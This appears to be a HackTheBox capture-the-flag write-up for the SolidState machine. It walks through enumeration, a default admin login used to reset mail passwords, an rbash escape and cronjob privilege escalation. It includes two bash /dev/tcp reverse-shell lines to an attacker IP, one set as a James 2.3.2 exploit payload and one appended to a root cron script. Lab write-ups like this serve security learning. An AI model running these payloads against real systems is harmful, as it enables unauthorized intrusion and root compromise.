HackTheBox — SolidState Writeup
SolidState is a medium level OSCP like linux box on HackTheBox.In this machine we deal with rsip and pop3service,james exploit and privilege escalate via a cronjob.I will also cover a Rabbit Hole which i fell into however it hasn’t been mentioned in any other writeup. Do note that there are 2 way to get a initial shell in this box.One is by finding ssh credentials and another is by exploit James Server 2.3.2.
Enumeration
We find various ports open.After running autorecon i also discovered port 4555 open.You need to do a full nmap scan on all tcp ports to find it.
i ran gobuster on the webpage running on port 80 however i did not find anything interesting.
I checked out all folders in assets directory but did not find anything as well
ENUMERATING SMTP PORT 25
Lets first scan smtp with nmap’s nse script.I Did not find any CVE’s.For more info on enumerating smtp refer hacktricks -https://book.hacktricks.xyz/network-services-pentesting/pentesting-smtp
Lets connect to smtp . Nothing interesting found
Now lets enumerate rsip running on port 4555. I did not find any guide in hacktricks but found a guide in an online cheat sheet-https://cheatsheet.haax.fr/network/services-enumeration/4555_rsip/
Lets connect to rsip
REFER-https://cheatsheet.haax.fr/network/services-enumeration/4555_rsip/
When we connect to rsip it will ask for username and password.We try root:root and it works! Next we run the HELP command to see what commands we can run.One such command that stands out is “setpassword”
We run the command “listusers” to see all the users we have and then we change ther password using “setpassword” command. eg: we setjames password to james, mindy’s password as mindy.You can set whatever password you wish to.
Once we have all the username and passwords (which we have set) now its time to log in to each user and see whats in their mail.As you know, that pop3 service is used for this job.so lets connect to it.
GUIDE FOR POP3- https://book.hacktricks.xyz/network-services-pentesting/pentesting-pop
As you can see below, we are connecting to pop3, login in as user mindy along with her password which is mindy and once we are in we run the LIST command to show all mails. We find 2 mails. To read the first mail(1109) we run the command retr 1. (NOTE: Everything is explained in the link given above.The hacktricks guide contains all the pop3 commands you can run)
and then we run retr 2 to read the second mail(836).The mail contains mindy’s SSH username and password
We connect to mindy using → ssh mindy@<target-ip>
ALTERNATE METHOD
We can also get a shell by exploiting the James Server v 2.3.2 running on port 4555.I found this in ippsec’s video.
Apache James Server 2.3.2 — (Remote Command Execution)-https://www.exploit-db.com/exploits/35513
The usage is pretty simple.You need to edit the exploit and set the payload to a reverse shell( Change the line 19th of the exploit to:
payload = bash -i >& /dev/tcp/10.10.14.23/1234 0>&1
Now run the exploit → python exploit.py <target-ip>
Start a netcat listener on port 1234 of your kali and connect to user mindy using ssh which will trigger the exploit.
ssh mindy@target-ip
SO WE HAVE A SHELL !
However when we try to run basic commands like cd, it does not work.I ran echo $BASH to see what type of bash we have and its a rbash or restricted bash meaning you can run only few limited commands here.
We have to escape this jail shell.If i run the ssh command using bash at the end, it will give me a bash shell where i can run all commands.
now we have a proper shell !
RABBIT HOLE !!!
This is a rabbit hole i fell into.I ran linpeas on the target and found port 632 listening locally
I ran the curl command on it to see any data and i see a website www.cups.org running(see the last line)
I did SSH Local port forwarding. I forwarded targets port 631 to my kali’s 9005
ON my kali browser i went to port 9005 and i found a website running along with version. CUPS 2.2.1. I was tempted and found a RCE exploit however it did not work at the end.
Turns out this was not the intended way and a big rabbithole. So Let me cover the intended way to privilege escalate and finish this box.
PRIVILEGE ESCALATION
i ran pspy32 on the target and found a cron job running tmp.py file every 3 min.
I read the contents of temp.py file which contains a basic python script to remove all files within /tmp folder. Next when i run ls -la command on the file to see permissons, i saw that we have full access to the file(rwx)read,write,execute.
All we have to do is add a python reverse shell at the end of the python script and wait for the cronjob to run.
i tried this python 2 reverse shell script given below however i did not get a shell in my netcat just a connect message.
Turns out that the only command that will work in this box is
os.system(‘bash -c “bash -i >& /dev/tcp/10.10.14.47/443 0>&1”’)
we add it to the end of the file and start out netcat listener and wait for the cronjob to run and volia ! we get a shell as root.
CONCLUSION
This was a fun and interesting box.I hope you learned something from this writeup.For for such OSCP like ctf writeups and cybersecurity articles make sure to follow me here on medium. — ZEUS
